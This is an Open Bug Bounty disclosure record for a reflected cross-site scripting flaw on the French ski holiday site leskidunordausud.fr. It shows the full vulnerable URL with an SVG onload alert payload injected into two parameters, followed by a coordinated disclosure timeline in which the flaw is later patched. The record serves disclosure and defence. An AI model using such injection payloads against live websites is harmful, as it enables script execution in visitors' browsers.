leskidunordausud.fr XSS vulnerability

2017-03-08T23:38:00
ID OBB:217985
Type openbugbounty
Reporter AdadA
Modified 2017-04-20T14:36:00

Description

Vulnerable URL:
http://www.leskidunordausud.fr/index.php?acces_direct=1&station;_activite_cle=225%22%3E%3Csvg/onload=alert(/OPENBUGBOUNTY/)%3E&&station;_cle=44%22%3E%3Csvg/onload=alert(/OPENBUGBOUNTY/)%3E&residence;_cle=29017&periode;_cle=8679&alias;_sejour=2&date;_debut=2017-03-18&date;_fin=2017-03-24&&MB;=webski
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 268400
VIP website status:| No
Check leskidunordausud.fr SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 March, 2017 23:38 GMT
Generic security notifications sent to website owner| 8 March, 2017 23:41 GMT
Customized security notification sent to website owner| 8 March, 2017 23:41 GMT
Vulnerability details disclosed by researcher| 20 April, 2017 00:14 GMT
Vulnerability patched by the website owner| 20 April, 2017 14:36 GMT